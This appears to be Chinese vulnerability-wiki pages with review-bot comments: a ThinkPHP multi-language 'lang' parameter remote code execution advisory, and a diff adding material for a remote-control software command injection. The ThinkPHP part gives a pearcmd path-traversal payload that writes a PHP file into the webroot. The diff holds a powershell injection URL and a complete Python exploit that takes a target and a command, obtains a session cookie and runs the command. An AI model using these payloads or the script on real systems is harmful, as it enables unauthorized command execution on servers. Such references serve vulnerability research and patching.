该漏洞是由于 Thinkphp 开启了多语言功能,并且对参数 lang 传参过滤不严谨,导致攻击者可利用该漏洞执行命令。
## 漏洞影响
```
ThinkPHP >=V6.0.1<=V6.0.13
ThinkPHP >=V5.0.X<=V5.1.X
```
## 漏洞复现
payload
```
/index?lang=…/…/…/…/…/…/…/…/usr/local/lib/php/pearcmd&+config-create+/&/+/var/www/html/test.php
```
## 漏洞修复
官方已发布漏洞补丁及修复版本,可以评估业务是否受影响后,酌情升级至安全版本。
如不需要多语言功能,请及时关闭此功能,可参考官方文档:
- https://www.kancloud.cn/manual/thinkphp6_0/1037637
- https://static.kancloud.cn/manual/thinkphp5/118132
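Review bot: the payload depends on pearcmd being present at /usr/local/lib/php/pearcmd, a precondition the 漏洞描述 never mentions; state it, since installs without PEAR are not reachable this way and removing PEAR from the image is an additional mitigation beyond disabling the multi-language feature. The 漏洞影响 lines >=V6.0.1<=V6.0.13 and >=V5.0.X<=V5.1.X need a space or comma between the two bounds, and 5.0.X<=5.1.X is not a precise range; give the exact 5.x boundaries.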

View File

@ -36,4 +36,49 @@ body="Verification failure"
/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+ipconfig
```
![](./images/202205241354108.png)
![](./images/202205241354108.png)
## 漏洞修复
1. 输入检查:应用程序必须实现输入检查机制,将所有从外部接收的数据都进行严格的检查和过滤,防止恶意代码被注入。
2. 参数化查询:采用参数化查询可以防止攻击者通过利用应用程序的注入漏洞来修改查询语句,实现任意代码执行的攻击。
3. 输出编码:在输出时对敏感字符进行编码保护,比如 HTML 编码,防止恶意代码直接输出执行。
4. 使用最新的安全防护措施:保证服务器系统和应用程序的所有组件、库和插件都是最 新的,确保已知的漏洞都得到修复。
5. 强制访问控制:应该设置访问控制机制,确保恶意用户无法访问敏感数据和代码。
## 漏洞POC
exp
```
import requests,sys
ip = sys.argv[1]
command = sys.argv[2]
payload1 = "/cgi-bin/rpc?action=verify-haras"
payload2 = "/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+"
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'
}
if "http://" not in ip:
host = "http://" + ip
else:
host = ip
try:
s = requests.Session()
res = s.get(url=host + payload1,headers=headers)
if res.status_code == 200:
res = res.json()
Cid = res['verify_string']
headers.update({'Cookie':"CID=" + Cid})
res1 = s.get(url=host + payload2 + command,headers=headers)
res1.encoding = "GBK"
print(res1.text)
else:
pass
except Exception as e:
print(e)
```
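Review bot: the 漏洞修复 list is generic and item 2 (参数化查询) does not apply here: the issue shown is an OS command injection through the cmd=ping... parameter of /check, not SQL, so replace it with the relevant control (never hand the parameter to a shell; validate it against an allowlist of hostnames or IP addresses) and reference the vendor patch. Every other page in this commit puts 漏洞复现 before 漏洞修复, but the new 漏洞POC section is placed after the fix section; move it up. The image ![](./images/202205241354108.png) is inserted twice; keep one.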